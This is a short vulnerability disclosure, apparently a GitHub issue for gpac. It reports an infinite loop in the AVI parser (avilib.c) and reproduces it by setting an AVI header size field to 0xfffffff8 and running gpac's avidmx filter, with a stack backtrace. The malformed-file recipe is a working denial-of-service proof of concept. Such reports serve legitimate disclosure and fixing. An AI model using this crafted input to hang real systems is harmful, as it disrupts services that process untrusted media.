A inf loop security issue in gpac/gpac
The issue occurs in code: src/media_tools/avilib.c#L1974, when the gpac avidmx filter parses the AVI format file.
choose a simple AVI format file, the data’s header is as follows in xxd mode
$ xxd ./1.avi | head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354 RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 3800 0000 ."..hdrlavih8...
Use vim in xxd mode, to change the header’s size member hex data to 0xfffffff8(-8), the modified data is as follows
$ xxd ./1.avi| head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354 RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 f8ff ffff ."..hdrlavih....
Then run command with avidmx filter, you will observe an inf loop situation.
./gpac -i ./1.avi -o 123 avidmx
Its stack backtrack is as follow
#0 __strncasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:166
#1 0x00007ffff7a5c62c in avi_parse_input_file.part () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#2 0x00007ffff7a5e9f7 in AVI_open_input_file () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#3 0x00007ffff7bf11d9 in avidmx_process () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#4 0x00007ffff7baced0 in gf_filter_process_task () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#5 0x00007ffff7b9abc4 in gf_fs_thread_proc () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#6 0x00007ffff7b9fb2b in gf_fs_run () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#7 0x0000555555564a5a in gpac_main ()